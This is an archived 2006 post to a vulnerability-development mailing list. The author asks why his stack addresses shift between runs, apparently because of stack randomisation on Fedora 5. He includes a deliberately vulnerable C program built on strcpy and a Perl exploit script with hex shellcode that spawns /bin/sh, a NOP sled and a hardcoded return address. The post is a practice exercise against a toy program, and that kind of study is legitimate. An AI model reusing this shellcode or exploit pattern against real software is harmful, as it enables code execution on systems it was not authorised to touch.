Vulnerability Development mailing list archives
"Moving" Stack: my poor return address!
From: Jack C <list-recv () crepinc com>
Date: Mon, 31 Jul 2006 22:03:33 -0400
Hello,To see if I still knew how to code simple buffer overflows after a long absence from it, I threw together a quick vulnerable C program today and wrote and exploit for it. The whole process went great, until I went to find the return address I wanted in the stack. I have a 4096 byte buffer, and since I had the room I put in 2048 NOPs at the beggining of the buffer. However, when I run the exploit then open the core in gdb, the stack is always in a different place. And we're not talking about different place by a few thousand bytes, either. One time I'll run it and the NOPs will be at 0xbfe4dab0, the next time they will.be at 0xbf9af420. That's a HUGE distance away!
I'm running on Fedora 5. Is this a security thing that's new in the past 2 years or so since I've coded one of these? Is there any way I can either (1) make the stack sit still so I can point into it or (2) find out where it is during execution?
------- lame.c ------ #include <stdio.h> #include <stdlib.h> int main( int argc, char *argv[]) { char buffer[4096]; //we're gonna overflow this jawn if (argc!=2) { printf("Usage: %s <string to copy>\n",argv[0]); return 1; } strcpy(buffer,argv[1]); //tisk tisk tisk printf("Buffer now holds: %s\n",buffer); return 0; } -----end lame.c ----- ------exp.pl ----- #!/usr/bin/perl my $prog="/home/jack/break/lame"; my $buffer; # shellcode - /bin/sh; uname -a; id | 89 bytes */ my $c0de="\xeb\x1f\x5f\x89\xfc\x66\xf7\xd4\x31\xc0\x8a\x07". "\x47\x57\xae\x75\xfd\x88\x67\xff\x48\x75\xf6\x5b". "\x53\x50\x5a\x89\xe1\xb0\x0b\xcd\x80\xe8\xdc\xff". "\xff\xff\x03\x65\x63\x68\x6f\x20\x5b\x45\x6c\x65". "\x63\x74\x72\x6f\x6e\x69\x63\x53\x6f\x75\x6c\x73". "\x5d\x3b\x20\x75\x6e\x61\x6d\x65\x20\x2d\x61\x3b". "\x20\x69\x64\x3b\x20\x03\x2d\x63\x02\x2f\x62\x69". "\x6e\x2f\x73\x68\x01"; $buffer="\x90"x(2048+(1024-length($c0de))); #NOPs $buffer.=$c0de; #shellcode$buffer.="\xc0\x15\x9d\xbf"x(1024/4); #retr addr: 0xbf9d15c0 WAS in the middle...
# other addresses the NOPS were... look how far apart these are! #0xbfe4dab0-0xbfe4e640 #0xbf9af420-0xbf9affa0 exec $prog, $buffer; -----end exp.pl------ Thanks for looking, hope someone can lend a hand... -Jack Carrozzo jack _{@}_ crepinc.com
Current thread:
- "Moving" Stack: my poor return address! Jack C (Aug 01)
- Re: "Moving" Stack: my poor return address! Andrea Purificato - bunker (Aug 02)
- Re: "Moving" Stack: my poor return address! Alexander Klimov (Aug 02)
- Re: "Moving" Stack: my poor return address! Steve Bonds (Aug 02)
- Re: "Moving" Stack: my poor return address! Jon Erickson (Aug 02)
- <Possible follow-ups>
- Re: "Moving" Stack: my poor return address! list-recv (Aug 02)
- RE: "Moving" Stack: my poor return address! salexander (Aug 02)
- Re: "Moving" Stack: my poor return address! Javor Ninov (Aug 29)